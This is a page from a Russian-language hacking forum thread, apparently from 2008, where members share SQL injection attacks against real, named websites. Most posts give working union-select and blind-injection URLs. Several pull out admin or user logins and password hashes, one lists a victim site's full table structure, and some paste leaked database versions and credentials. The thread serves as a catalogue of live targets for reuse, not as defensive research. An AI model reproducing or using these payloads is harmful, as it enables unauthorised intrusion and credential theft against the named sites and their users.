HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 555 из 1602 « Первая < 55455505545 551 552 553 554 555 556 557 558 559 56560565510551555 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.06.2008, 04:03
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
По умолчанию
http://www.eicta.org/index.php?id=32&id_article=93'
http://www.paintball.ru/next.php?id=999919+union+select+1,2,VERSION()
http://www.comingsoon.net/films.php?id=1+union+select+VERSION()
http://www.fcdynamo.ru/players.php?id=-1'+union+select+table_name+from+information_schema .tables+limit+59,1/*
http://expressorder.ru/forum/message.php?id=11'
http://www.hpol.org/record.php?id=72
http://www.mymaika.ru/catalog.php?id=181'
http://www.fm.gov.lv/index.php?id=8'
http://www.mtas.ru/second.php?ID=-243+union+select+1/*
http://opel.avto-city.ru/catalog.php?id=-3+union+select+1,2,3,4,5,6,7/*
http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name='admins'+lim it+1,1/*
http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,concat(admin_name,0x3a,admin_pa ssword),4,5,6,7+from+admins+limit+5,1/*
http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,2,3,4,VERSION()/*
http://www.rudtp.ru/articles.php?id=44+union+select+1,2,3,4,5,6,7/*
http://www.acte.org/resources/press_release.php?id=-284+union+select+1,2,3,4,5,6,7,8,9/*
http://www.analisi.ru/regulations.php?id=-3+union+select+1,2,3,4/*
http://ansijournals.com/3/c4p.php?id=1'&theme=3&jid=itj
http://www.bmoca.org/artist.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25/*
http://www.chinesejetpilot.com/index.php?ID=-202+union+select+1,2,3,4,5,6/*
http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+1/*
http://zoorinok.com.ua/razdel/&podrazdel=-306+union+select+1,VERSION(),3,4,5,6/*
================================================== =============
lastsmile,я твою первую скулю давненько нашел,но ты оказался тут первым=)
 
Ответить с цитированием

  #2  
Старый 08.06.2008, 11:38
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию
www.glaad.org

Уязвимость:

Код:
http://www.glaad.org/media/resource_kit_detail.php?id=3457'
Колонки:

Код:
http://www.glaad.org/media/resource_kit_detail.php?id=-3457+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
Информация о базе:

Код:
glaad_www_1
4.0.12-standard
glaad@localhost
 
Ответить с цитированием

  #3  
Старый 08.06.2008, 12:26
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию
www.suter.ru

Сайт российских сутенеров

Цитата:
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1&table=cras
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1<ascii(subs tring((SELECT+table_name+FROM+information_schema.t ables+limit+63,1),1,1))&table=cras
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1<ascii(subs tring((SELECT+column_name+FROM+information_schema. columns+WHERE+table_name+like+'sites'+limit+1,1),1 ,1))&table=cras
VERSION() - 5.1.11-beta
USER() - xstars_u@localhost
DATABASE() - db_xstars_u


Структура таблиц
Код:
**************************
	agent
--------------------------		
	name		
	cvet	
**************************
	attak
--------------------------
	ip	
	k-vo	
	interval	
	adres	
	site	
	otprmail
**************************
	buf
--------------------------
	ip	
	vrem	
	adres	
	site	
**************************
	clicks
--------------------------
	ip	
	banner_id	
	time	
	referer	
**************************
	club
--------------------------
	name	
	name_en	
	opisanie	
	opisanie_en	
	photo	
	link	
	data	
	block	
**************************
	sessions
--------------------------
	uid	
	expire	
	ip	
**************************
	sites
--------------------------
	site	
	log	
	posl	
	poslstr	
	id	
	name	
**************************
	users
--------------------------
	name	
	email	
	transfer	
	phone	
	site	
	password
**************************
	devk
--------------------------
	new	
	name	
	name_en	
	prioritet	
	rate	
	id_goroscop	
	razmer	
	rost	
	ves	
	grud	
	vozrast	
	id_gorod	
	id_metro	
	adres	
	mail	
	club	
	text	
	text_en	
	hour_app	
	hour2_app	
	night_app	
	hour_out	
	hour2_out	
	night_out	
	sutki	
	valut	
	photosmall	
	time_block	
	data	
	block	
	prosmotr	
	penis	
	kto	
	chya	
	blockind	
**************************
	dnevniky
--------------------------
	nazv	
	smtext	
	text	
	links	
	date	
**************************
	foto
--------------------------
	id_devk	
	foto		
**************************
	gorod
--------------------------
	name	
	name_en	
**************************
	goroscop
--------------------------
	name	
	name_en	
**************************
	message
--------------------------
	r_id	
	name	
	subject	
	msg	
	email	
	m_date	
	ip
**************************
	message1
--------------------------
	id_devk	
	nick	
	mess	
	data
**************************
	message_en
--------------------------
	r_id	
	name	
	subject	
	msg	
	email	
	m_date	
	ip
**************************
	metro
--------------------------
	name	
	name_en	
**************************
	param
--------------------------
	mned	
	ened	
	kned	
	pned	
	transned
**************************
	podrugy
--------------------------
	podruga_id
**************************
	poll_alternatives
--------------------------
	alternative	
	votes	
	id
**************************
	polls
--------------------------
	question	
	active	
	dateactive	
	votes
**************************
	polz
--------------------------
	login	
	pass	
	mail	
	balance	
**************************
	site_news
--------------------------
	nazv	
	text	
	date
**************************
	soedcp
--------------------------
	id_club	
**************************
	soeddp
--------------------------
	id_devk	
**************************
	suter_cras
--------------------------
	name	
	block	
**************************
	suter_crast
--------------------------
	id_cras	
	nazv	
	text	
	date
**************************
	suter_lgesotr
--------------------------
	block	
	name	
	text	
	foto1	
	foto2	
	foto3	
	gorod	
	ip	
	datetime
**************************
	suter_nazam
--------------------------
	name	
	block
**************************
	suter_nazamt
--------------------------
	id_nazam	
	nazv	
	text	
	date
**************************
	suter_psevdoklienty
--------------------------
	name	
	ip	
	mail	
	telephone	
	telephone2	
	mbtelephone	
	mb2telephone	
	name_ps	
	adres	
	avto	
	soobsh	
	date	
**************************
	suter_rassilk
--------------------------
	mail	
	ip	
	date
**************************
	suter_urb
--------------------------
	name	
	block	
**************************
	suter_urbt
--------------------------
	id_urb	
	nazv	
	text	
	date
**************************
	svaz_uslug
--------------------------
	id_usl	
**************************
	telephone
--------------------------
	id_club	
	operator
**************************
	telephoneind
--------------------------
	tel	
	operator
**************************
	uslugy
--------------------------
	name	
	name_en	
	kto
**************************
	video
--------------------------
	id_devk	
	namev	
	data
**************************
	x_news
--------------------------
	nazv	
	nazv_en	
	smtext	
	smtext_en	
	text	
	text_en	
	img	
	date	
**************************
 
Ответить с цитированием

  #4  
Старый 08.06.2008, 15:46
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


По умолчанию
proretail.com.ua

Цитата:
http://proretail.com.ua/kont.php?c_i=-1+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMA TION_SCHEMA.TABLES/*
Цитата:
http://proretail.com.ua/kont.php?c_i=-1+union+select+1,2,concat_ws(0x3a,login,pas,mail), 4,5,6,7+from+user/*
Цитата:
http://media-intelligence-partners.com/briefings.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8/*
 
Ответить с цитированием

  #5  
Старый 08.06.2008, 16:03
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию
pastebin.ru
Случайно найдена Chaak`ом и мной..

постим что-то типа кода (не указывая имя):

Цитата:
'
U0NSSVBUX05BTUU=','MS4x','Yg==','eQ==','IA==','RA= =','WA==','IA=='
,-union+select+1,2'
резалт:
Цитата:
Query failure: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2\' ?>',294388)' at line 2
insert into pastebin (poster, posted, code, parent_pid) values ('Гость',now(),'',294388);
 
Ответить с цитированием

  #6  
Старый 08.06.2008, 17:25
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
По умолчанию
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,1 
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
Код:
http://www.autometaldirect.com/content.php?page=-118+union+select+1,2,concat_ws(0x3a,useremail,userpassword),4,null,6,7,8,9,10,11,12 
+from+user/*
 
Ответить с цитированием

  #7  
Старый 08.06.2008, 17:33
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию
Цитата:
Сообщение от baltazar  
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,1 
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
=(( многоразовый боян.

юзай
http://filefront.jino-net.ru/sql.html
 
Ответить с цитированием

  #8  
Старый 08.06.2008, 20:51
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


По умолчанию
nexia.com
Код:
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.20-community-ntnexiausr@localhostnexia
Код:
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat(username,0x3,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+tmembers+limit+0,1/*
estudiogior5ar
 
Ответить с цитированием

  #9  
Старый 08.06.2008, 20:57
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


По умолчанию
Pogoda.ua. Погода в Украине и мире. Погода в Киеве. Прогноз погоды на 10 дней

Цитата:
http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,ema il),3,4,5+from+users+limit+0,1/*
test:test:test@localhost.com
 
Ответить с цитированием

  #10  
Старый 08.06.2008, 21:46
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


По умолчанию
globaleconomicgovernance.org
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7/*
5.0.45-logdbo158065722@212.227.118.42db158065722
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,unhex(hex(concat_ws(0x3,userloginname,userpassword))),3,4,5,6,7+from+upload_users/*
test_user32570e9ad6d773db0af65ac057c5e4a7f
 
Ответить с цитированием
Ответ
Страница 555 из 1602 « Первая < 55455505545 551 552 553 554 555 556 557 558 559 56560565510551555 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.